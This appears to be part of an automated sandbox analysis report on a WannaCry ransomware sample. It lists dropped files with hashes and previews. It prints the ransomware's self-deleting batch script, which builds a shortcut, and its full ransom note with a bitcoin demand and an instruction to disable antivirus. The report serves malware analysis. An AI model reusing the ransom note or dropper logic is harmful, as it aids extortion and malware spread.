                                SHA-512:E196366CD6F821A9945DFA102F39972E97D2443216EF0F645DF0A6DD4CD72300F8BB9BCAB03E2A0C5BA0D9F4A1475ECAF771EAECCB401E6CA333DBC3E0576CF6
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......P:...by.......G..+,k.>.H...../..+FZ.....;.......E.....9....)..%.Q."|.....G#4. ....&..).Z._...x.v......../O.z}.;O}....%...#J.5.....+....W'.T%...i.v'....[..n...............?&...9o.F....,Lg.}.. ....j.............:......f.+..+#...p.pC..C.a..E.............).;8....s....f,I5.....y1..}...b..s..Qr.f.^..........[..v.c.......)...d....J......[.^o.......g...R.2|..LR'.4&aPT...6\..'d..zG..}-....T..+..s.e.....w..H.0Z.5^V#.....}..r.$.A...Ka.l.n.....2.. ?6?.....+.PU......9.7...R.Z...S~..<.r...^.]...KWA................?...3. .....03v....}F._....&.....xPiU.(FZ!....Y..p..5....Pv{.QH.L.....2<F..)....a......7._}....@.eT..u.*.\...k..~|8.:..+.....,l.D.Cm.pp.-Fi.v.+.h...D..h.r.~......e.g........q....LN.H..el......v.\.K.B..o._a.:.........lMmk.9...r...W.O....M...;.J,z.u(.4.x....+....kq._...A...:...'.M..l.w.p.,E</..;.$......1.y.1......K_;..a..AF&.yu.U...3&..x.5.61........Y.0.Hd:g..}r.G.mS...f......I...+..32.....A.I,h...Ckm.1...=<...R.......~...z7

                                C:\Users\user\AppData\Roaming\tor\cached-certs (copy)

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):18574
                                Entropy (8bit):6.051386964524659
                                Encrypted:false
                                SSDEEP:384:e/4DVEl1hn9h4VQV01h2p1Z/ea4igBVA1hrqEd24HVO1hchb50IU4mV91h5jMY4a:kyKDHLWSH2a9gBSyo2ak4hb+3jntHJLd
                                MD5:94A43CE53E36DC6B9B4CD0630E1B2ED7
                                SHA1:3E63294408CE8EB0D5C448BE6F0C46C8B4275AF6
                                SHA-256:74E161BD53C28548B24895D4F10D4C0781ED0209979E881A7D3F0840ABB2083D
                                SHA-512:07C3643C2E89D56434E20F321E51927E75D30AC86A9C3D59118E49E3B3B232BBAE158DD2029D084DDA914FA700C96F8F759FD43E6DD4FB505986F3EC798AAD47
                                Malicious:false
                                Reputation:unknown
                                Preview:dir-key-certificate-version 3..fingerprint 23D15D965BC35114467363C165C4F724B64B4F66..dir-key-published 2022-09-16 19:14:12..dir-key-expires 2023-09-16 19:14:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAlv6XS+VppPaQzOgor0YFlcXLWeXiMn5N3VBneXuw8maLOu9oPJ9z..2/oMQN8a+VOWTf+/jebGzOBK6MamXpgsIZPQWiT18gZMsYdR8mcqBYqVP3khwUWh..9QYkV+m+Auxa0TLzTrsi6dLDJ384XdpDweU+YJghMJNZ1NqiT8ogj84hxs5Tf+Qf..bn7EBIcU7SAKr5Lw25KrMb5e3AZSC5MilBS/KLgVTq/GiWb7pKd5pxGwlGolNX8a..PccZ2ZT2DrSQsct4wVxhSbUqANI3PfMpXvmUDxWWBgbQwLF02/4gi+13snlHtqwl..y1WjE55HVfx1CTX13SStwmF/N3SFtFf1qil3j5qrHdHtKlAYOaTfqab1eLVH1l83..LI5QWD7ri9GpPqIjlh6PuaHjaO2FW20SouZtS9jJKwi1l1G3ef1tSlha1cxkRxIp..U/ngvQBsoa9X26VfQA4MieZgVVdMVwjCNh2YC9aEXc/KxfcBueZkM1194qP88cVu..dOFYaftOkuGPAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAocBazlzJr02eAiuhp3Rs42ED+p0AlTm7ZwMJ40rqJCTKcyX6tghM..9H6+m7WP5AVJBvkdRHIVECwTJ+jAHCpq4/oYAptYEWO8jgvLLfRwp0wZ3hFQ02iy..Ou/Zk0pLezbL9Y06HwcDetdcZtr4

                                C:\Users\user\AppData\Roaming\tor\cached-certs.tmp

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):18574
                                Entropy (8bit):6.051386964524659
                                Encrypted:false
                                SSDEEP:384:e/4DVEl1hn9h4VQV01h2p1Z/ea4igBVA1hrqEd24HVO1hchb50IU4mV91h5jMY4a:kyKDHLWSH2a9gBSyo2ak4hb+3jntHJLd
                                MD5:94A43CE53E36DC6B9B4CD0630E1B2ED7
                                SHA1:3E63294408CE8EB0D5C448BE6F0C46C8B4275AF6
                                SHA-256:74E161BD53C28548B24895D4F10D4C0781ED0209979E881A7D3F0840ABB2083D
                                SHA-512:07C3643C2E89D56434E20F321E51927E75D30AC86A9C3D59118E49E3B3B232BBAE158DD2029D084DDA914FA700C96F8F759FD43E6DD4FB505986F3EC798AAD47
                                Malicious:false
                                Reputation:unknown
                                Preview:dir-key-certificate-version 3..fingerprint 23D15D965BC35114467363C165C4F724B64B4F66..dir-key-published 2022-09-16 19:14:12..dir-key-expires 2023-09-16 19:14:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAlv6XS+VppPaQzOgor0YFlcXLWeXiMn5N3VBneXuw8maLOu9oPJ9z..2/oMQN8a+VOWTf+/jebGzOBK6MamXpgsIZPQWiT18gZMsYdR8mcqBYqVP3khwUWh..9QYkV+m+Auxa0TLzTrsi6dLDJ384XdpDweU+YJghMJNZ1NqiT8ogj84hxs5Tf+Qf..bn7EBIcU7SAKr5Lw25KrMb5e3AZSC5MilBS/KLgVTq/GiWb7pKd5pxGwlGolNX8a..PccZ2ZT2DrSQsct4wVxhSbUqANI3PfMpXvmUDxWWBgbQwLF02/4gi+13snlHtqwl..y1WjE55HVfx1CTX13SStwmF/N3SFtFf1qil3j5qrHdHtKlAYOaTfqab1eLVH1l83..LI5QWD7ri9GpPqIjlh6PuaHjaO2FW20SouZtS9jJKwi1l1G3ef1tSlha1cxkRxIp..U/ngvQBsoa9X26VfQA4MieZgVVdMVwjCNh2YC9aEXc/KxfcBueZkM1194qP88cVu..dOFYaftOkuGPAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAocBazlzJr02eAiuhp3Rs42ED+p0AlTm7ZwMJ40rqJCTKcyX6tghM..9H6+m7WP5AVJBvkdRHIVECwTJ+jAHCpq4/oYAptYEWO8jgvLLfRwp0wZ3hFQ02iy..Ou/Zk0pLezbL9Y06HwcDetdcZtr4

                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with very long lines (950), with CRLF line terminators
                                Category:dropped
                                Size (bytes):2157020
                                Entropy (8bit):5.655511450541517
                                Encrypted:false
                                SSDEEP:12288:LqbPNRmEgT4z/ebWMu6LFgrAIdUUVUvnTymBxLIUtyygMH:LiAo2JTUGvTNrryyx
                                MD5:522791A01E600357F769EC5BDD9FEB25
                                SHA1:DF170AD6F98E10951D0C5CB37AC9A9CACFFD8FB7
                                SHA-256:E232D5F92D53E5A1F069CCA489C4C2CF6830115957F4331E39543632C79DAC0D
                                SHA-512:A0AE86A9712A1FD9663177B1877727152DD754D9F604D46D32298BA41E64D3808952761B662DDA728D097D91ABD8EE2E7AA8D685B5F0C6B7AE2CF21BD518261A
                                Malicious:false
                                Reputation:unknown
                                Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-01-31 15:00:00..fresh-until 2023-01-31 16:00:00..valid-until 2023-01-31 18:00:00..voting-delay 300 300..client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4

                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with very long lines (950), with CRLF line terminators
                                Category:dropped
                                Size (bytes):2157020
                                Entropy (8bit):5.655511450541517
                                Encrypted:false
                                SSDEEP:12288:LqbPNRmEgT4z/ebWMu6LFgrAIdUUVUvnTymBxLIUtyygMH:LiAo2JTUGvTNrryyx
                                MD5:522791A01E600357F769EC5BDD9FEB25
                                SHA1:DF170AD6F98E10951D0C5CB37AC9A9CACFFD8FB7
                                SHA-256:E232D5F92D53E5A1F069CCA489C4C2CF6830115957F4331E39543632C79DAC0D
                                SHA-512:A0AE86A9712A1FD9663177B1877727152DD754D9F604D46D32298BA41E64D3808952761B662DDA728D097D91ABD8EE2E7AA8D685B5F0C6B7AE2CF21BD518261A
                                Malicious:false
                                Reputation:unknown
                                Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-01-31 15:00:00..fresh-until 2023-01-31 16:00:00..valid-until 2023-01-31 18:00:00..voting-delay 300 300..client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4

                                C:\Users\user\AppData\Roaming\tor\state (copy)

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):661
                                Entropy (8bit):5.187578283045712
                                Encrypted:false
                                SSDEEP:12:bwxXSdyXr87HVBvwN1+ylNgdydOR0IlFqNP84VgdKd/0V849fPRdr:bwRSMQ7HVB+BlNgEQuIlYP8agM6V86RV
                                MD5:1607E474FA94DE52AE631A9F121AE768
                                SHA1:0099DA780F5C663A3885FC9D347396C8982D9F3D
                                SHA-256:6644FA6A8523EB36D9B48FADDCC38B20E7AD7455AB6D06222459C3FDA3742F9F
                                SHA-512:CBCC110D5C54979E05F554BF86AA70361941F238194E2FDA9DEDA6EDEC12EBB7EF51536DABFB2B81D4B2A2C8941A036A999063C0B15E2F71B8651DF394B02341
                                Malicious:false
                                Reputation:unknown
                                Preview:# Tor state file last generated on 2023-01-31 16:20:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard whocares C56E98E934EDB5EEFA9322D5D4818E09325F7A80 DirCache..EntryGuardDownSince 2023-01-31 16:20:11 2023-01-31 16:20:12..EntryGuardAddedBy C56E98E934EDB5EEFA9322D5D4818E09325F7A80 0.2.9.10 2023-01-09 16:20:11..EntryGuard gesdm BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 DirCache..EntryGuardDownSince 2023-01-31 16:20:19 2023-01-31 16:20:19..EntryGuardAddedBy BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 0.2.9.10 2023-01-19 05:23:16..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-01-31 16:20:41..

                                C:\Users\user\AppData\Roaming\tor\state.tmp

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):661
                                Entropy (8bit):5.187578283045712
                                Encrypted:false
                                SSDEEP:12:bwxXSdyXr87HVBvwN1+ylNgdydOR0IlFqNP84VgdKd/0V849fPRdr:bwRSMQ7HVB+BlNgEQuIlYP8agM6V86RV
                                MD5:1607E474FA94DE52AE631A9F121AE768
                                SHA1:0099DA780F5C663A3885FC9D347396C8982D9F3D
                                SHA-256:6644FA6A8523EB36D9B48FADDCC38B20E7AD7455AB6D06222459C3FDA3742F9F
                                SHA-512:CBCC110D5C54979E05F554BF86AA70361941F238194E2FDA9DEDA6EDEC12EBB7EF51536DABFB2B81D4B2A2C8941A036A999063C0B15E2F71B8651DF394B02341
                                Malicious:false
                                Reputation:unknown
                                Preview:# Tor state file last generated on 2023-01-31 16:20:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard whocares C56E98E934EDB5EEFA9322D5D4818E09325F7A80 DirCache..EntryGuardDownSince 2023-01-31 16:20:11 2023-01-31 16:20:12..EntryGuardAddedBy C56E98E934EDB5EEFA9322D5D4818E09325F7A80 0.2.9.10 2023-01-09 16:20:11..EntryGuard gesdm BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 DirCache..EntryGuardDownSince 2023-01-31 16:20:19 2023-01-31 16:20:19..EntryGuardAddedBy BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 0.2.9.10 2023-01-19 05:23:16..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-01-31 16:20:41..

                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with very long lines (950), with CRLF line terminators
                                Category:dropped
                                Size (bytes):2157020
                                Entropy (8bit):5.655511450541517
                                Encrypted:false
                                SSDEEP:12288:LqbPNRmEgT4z/ebWMu6LFgrAIdUUVUvnTymBxLIUtyygMH:LiAo2JTUGvTNrryyx
                                MD5:522791A01E600357F769EC5BDD9FEB25
                                SHA1:DF170AD6F98E10951D0C5CB37AC9A9CACFFD8FB7
                                SHA-256:E232D5F92D53E5A1F069CCA489C4C2CF6830115957F4331E39543632C79DAC0D
                                SHA-512:A0AE86A9712A1FD9663177B1877727152DD754D9F604D46D32298BA41E64D3808952761B662DDA728D097D91ABD8EE2E7AA8D685B5F0C6B7AE2CF21BD518261A
                                Malicious:false
                                Reputation:unknown
                                Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-01-31 15:00:00..fresh-until 2023-01-31 16:00:00..valid-until 2023-01-31 18:00:00..voting-delay 300 300..client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4

                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp

                                Download File
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with very long lines (950), with CRLF line terminators
                                Category:dropped
                                Size (bytes):2157020
                                Entropy (8bit):5.655511450541517
                                Encrypted:false
                                SSDEEP:12288:LqbPNRmEgT4z/ebWMu6LFgrAIdUUVUvnTymBxLIUtyygMH:LiAo2JTUGvTNrryyx
                                MD5:522791A01E600357F769EC5BDD9FEB25
                                SHA1:DF170AD6F98E10951D0C5CB37AC9A9CACFFD8FB7
                                SHA-256:E232D5F92D53E5A1F069CCA489C4C2CF6830115957F4331E39543632C79DAC0D
                                SHA-512:A0AE86A9712A1FD9663177B1877727152DD754D9F604D46D32298BA41E64D3808952761B662DDA728D097D91ABD8EE2E7AA8D685B5F0C6B7AE2CF21BD518261A
                                Malicious:false
                                Reputation:unknown
                                Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-01-31 15:00:00..fresh-until 2023-01-31 16:00:00..valid-until 2023-01-31 18:00:00..voting-delay 300 300..client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4

                                C:\Users\user\Desktop\00000000.pky

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:b.out separate standalone executable Large Data Huge Objects Enabled
                                Category:dropped
                                Size (bytes):276
                                Entropy (8bit):7.080113392342748
                                Encrypted:false
                                SSDEEP:6:mtNEVvlGoT9x41D2Ef6VgEMes2NodybVgggEavCBwjCaIfWDT:YEV0Sx4x2ECvlsIgBEavhjCaIfQ
                                MD5:CDC89A589122070C1072B440CC3B0517
                                SHA1:F073E3640BC97CD95D60904D7EAB3021E3AD1FB5
                                SHA-256:DAC641E98A016D017F82ECB094BD62B1E30D1430E02AE906493AE5F1D712EEAB
                                SHA-512:DBF48E7D6C4692452D7A476B3608C153C6ED195577485DD2784A5BE69558925FF264B7464D11DD60A224A27AF9F16D04BC85E590BA97A239A23D58AF56FBF24F
                                Malicious:true
                                Reputation:unknown
                                Preview:........RSA1........UW./..%`h......H.0.+.~*...@..]h~p..(...6XT.5.V. ..7...^.V.......!-...L.....l.}n_.W.fXJ.3E....;L$......X.../J.y..Mo..;l+E.......^..T.M..XJM..-9j.....2a..>(.%....!... ..J...N.V.Dg<./..d..5..<...Mm.H.....k,10...(9..p...k...8.............C.S.....

                                C:\Users\user\Desktop\00000000.res

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):136
                                Entropy (8bit):1.503202962632402
                                Encrypted:false
                                SSDEEP:3:wPM/Qylll+jbXsd/l:QM/QylllqXsd/l
                                MD5:920D0CD9F4F1ECBFF75C0A7AC1BD3ABE
                                SHA1:58FFEBC7E3CD000C9BEB976931144CC3D2512FC6
                                SHA-256:90B491A89DF10BB33582D86F5A6E77D6AF82EC9AAE71A8C781F9A15E31898EF3
                                SHA-512:3EC9C1704985D1356FBB54B7622EBA1477624767D37D6B3332273294A4891633BD17D48CD65F6E0421FBE8AFBD94A33DC3572567C2BF1358BE4CFEFBCE778D67
                                Malicious:false
                                Reputation:unknown
                                Preview:.MG............................................................................................>.c.................?.c.>.cz....K......

                                C:\Users\user\Desktop\140021675181576.bat

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                Category:dropped
                                Size (bytes):320
                                Entropy (8bit):5.087022538559631
                                Encrypted:false
                                SSDEEP:3:mKDDfewSiponv6xewImKFcsDONy+WlynJ96wYexi+XCrbPONy+WlynJfF06xiHYM:hqn4+B9TnRoJgpPnRoJ0F9a2T2ZLT2Ln
                                MD5:09AAE1ABF5568DD1F940137DD8DAF634
                                SHA1:857AFA678E47B47033502409FF9F1ED630B2DB72
                                SHA-256:0520935E7778057E45B297E4B934EE3CE3DB1051B67BE1DD9015BACB5B36CD15
                                SHA-512:6BFE594D04349B567375B027D8468D8059428E1BD03C80A0006522ECA998D34597ECD62A6462C2668A9C38C11A3B663C781DC385E6AF5F32A7E6152317E82453
                                Malicious:false
                                Yara Hits:
                                • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\140021675181576.bat, Author: Florian Roth
                                Reputation:unknown
                                Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..

                                C:\Users\user\Desktop\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Desktop\@WanaDecryptor@.bmp

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Windows\SysWOW64\cscript.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Desktop\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.82054758729429
                                Encrypted:false
                                SSDEEP:24:ba9CvlkQ7njPiKJaQb4ngoWMtue9QAEgQlu:OmkQ7njaKJz4Z9QOQlu
                                MD5:D524A0762BF0695AA8F16F780B49AD46
                                SHA1:FF98D8E165CDB60B3F399E38CFFEF2D3A160AF25
                                SHA-256:3E2B096488AE9B37BCC075DC7FF921ADC9F8C6EC740EAE450A823F7DEF0AE30F
                                SHA-512:F2FBA3664D1643AC7027364A9DF96FE55A998BB98EC2E23434CCFC7880BED111C684E52C9E99743626678DC75456A3311CFC0AB2FD1B480AF3474B921E8BD5C5
                                Malicious:false
                                Reputation:unknown
